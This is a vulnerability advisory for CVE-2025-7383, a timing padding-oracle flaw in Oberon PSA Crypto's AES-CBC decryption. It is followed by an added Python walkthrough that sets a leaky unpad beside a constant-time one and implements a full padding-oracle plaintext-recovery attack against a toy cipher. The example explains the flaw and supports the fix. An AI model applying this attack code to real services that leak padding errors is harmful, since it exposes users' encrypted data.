Key Information
CVE ID: CVE-2025-7383
Title: Timing side-channel vulnerability in AES-CBC decryption with PKCS#7 padding in Oberon PSA Crypto
Severity: medium

Short Description
A padding oracle vulnerability exists in Oberon microsystem AG's Oberon PSA Crypto library in all versions from 1.0.0 up to and excluding 1.5.1. It allows an attacker to recover plaintexts by measuring timing differences during AES-CBC PKCS#7 decryption operations.

Vulnerability
Oberon PSA Crypto is vulnerable to a timing side-channel attack because its PKCS#7 padding removal is not constant-time. The AES-CBC decryption code (function in and a corresponding driver function in ) takes a measurably different amount of time in the "padding error" case than in the "no padding error" case, so the library acts as a padding oracle. An attacker who can submit thousands of chosen ciphertexts as probes and time their decryption can use this oracle to first determine the actual message length and then recover the message content byte by byte, without knowing the key. All clients using AES-CBC with PKCS#7 padding are affected.

Impact
Complete recovery of plaintext data.

Affected Versions
All versions of Oberon PSA Crypto from 1.0.0 to 1.5.0, inclusive.

Resolution
As a partial mitigation, the padding-removal code was made constant-time in release 1.5.1. Affected clients should upgrade to this version. A complete mitigation is beyond the scope of Oberon PSA Crypto: constant-time padding removal narrows the timing channel, but any other observable difference in how the application handles a padding failure (an error code returned to the sender, a retry, a log entry) leaks the same bit. Clients therefore need to validate the integrity of decrypted messages using application-specific, constant-time methods; in practice that means authenticating the ciphertext before attempting to decrypt or unpad it (an AEAD mode, or encrypt-then-MAC with a constant-time tag comparison) and rejecting unauthenticated messages outright.
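The following is an added worked example, not code from Oberon PSA Crypto or from the advisory's authors. It shows both halves of the story: an early-exit PKCS#7 unpad of the kind that leaks through timing beside a branch-free unpad of the shape a constant-time C implementation takes, and the two-step attack the advisory describes (find the message length, then recover the plaintext byte by byte) run against a CBC padding oracle. Assumptions: the block cipher is a toy 4-round Feistel permutation over SHA-256 standing in for AES so the script runs offline with the standard library only, and the oracle returns the "padding valid" bit directly, where a real attacker would extract that bit from decryption timing over many probes. All key and message values are constructed for the demo.

```python
"""Padding-oracle attack on CBC + PKCS#7, beside a constant-time unpad.

Added example; not Oberon PSA Crypto code. The cipher is a TOY Feistel
permutation (not AES); the attack only relies on a CBC decryption oracle
that reveals whether padding was valid.
"""
import hashlib
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# --- toy keyed 16-byte block permutation (stand-in for AES) ---------------
def _f(key, half, i):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, l, i)), l
    return l + r

# --- PKCS#7 --------------------------------------------------------------
def pkcs7_pad(msg):
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n

def unpad_leaky(data):
    """Early-exit check: the error path returns sooner than the success path,
    and how much sooner depends on where the first bad pad byte sits."""
    n = data[-1]
    if n == 0 or n > BLOCK:
        raise ValueError("bad padding")
    for b in data[-n:]:
        if b != n:
            raise ValueError("bad padding")
    return data[:-n]

def unpad_constant_time(data):
    """Inspect every byte of the last block, no data-dependent branches.
    Returns (valid, unpadded_length); length is unchanged when invalid.
    (Python cannot guarantee constant time; the structure is the point.)"""
    n = data[-1]
    good = 1 - ((((n - 1) | (BLOCK - n)) >> 8) & 1)   # 1 iff 1 <= n <= 16
    mism = 0
    for i in range(BLOCK):
        in_pad = ((i - n) >> 8) & 1                    # 1 iff i < n
        mism |= in_pad * (data[-1 - i] ^ n)            # nonzero on mismatch
    valid = good & (((mism - 1) >> 8) & 1)             # and mism == 0
    return bool(valid), len(data) - n * valid

# --- CBC and the oracle --------------------------------------------------
def cbc_encrypt(key, iv, msg):
    out, prev = b"", iv
    p = pkcs7_pad(msg)
    for i in range(0, len(p), BLOCK):
        prev = block_encrypt(key, xor(p[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt_raw(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_oracle(key):
    """Models the timing leak as a boolean: was the padding valid?"""
    def oracle(iv, ct):
        try:
            unpad_leaky(cbc_decrypt_raw(key, iv, ct))
            return True
        except ValueError:
            return False
    return oracle

# --- the attack ----------------------------------------------------------
def find_padding_length(oracle, iv, ct):
    """Step 1: flip bytes of the penultimate block left to right; the first
    flip that breaks the (originally valid) padding marks where the pad starts."""
    prev, last = (iv + ct)[-2 * BLOCK:-BLOCK], ct[-BLOCK:]
    for i in range(BLOCK):
        mod = bytearray(prev)
        mod[i] ^= 0xFF
        if not oracle(bytes(mod), last):
            return BLOCK - i
    raise RuntimeError("padding of the original ciphertext was not valid")

def recover_block(oracle, prev, target):
    """Step 2: learn D_k(target) one byte at a time from the right by forging
    the preceding block, then xor with the real preceding block."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad
            if oracle(bytes(forged), target):
                if pos == BLOCK - 1:            # rule out an accidental 0x02 0x02 match
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged), target):
                        continue
                inter[pos] = guess ^ pad
                break
        else:
            raise RuntimeError("no guess accepted")
    return xor(bytes(inter), prev)

def padding_oracle_attack(oracle, iv, ct):
    n = find_padding_length(oracle, iv, ct)
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                  for i in range(1, len(blocks)))
    return pt[:len(ct) - n]

if __name__ == "__main__":
    key, iv = os.urandom(16), os.urandom(16)           # constructed demo values
    msg = b"meter-id=4711; tariff=night; credit=12.50"
    ct = cbc_encrypt(key, iv, msg)
    print(padding_oracle_attack(make_oracle(key), iv, ct))
```

The attack never touches the key: every probe is a ciphertext with a forged preceding block, and each byte costs at most 256 oracle queries, which is why a few thousand timed probes suffice for a short message. Note that swapping `unpad_leaky` for `unpad_constant_time` inside the oracle only removes the timing difference; if the caller still reports the padding result to the sender in any observable way, `padding_oracle_attack` works unchanged, which is the reason the resolution above insists on authenticating ciphertexts before unpadding.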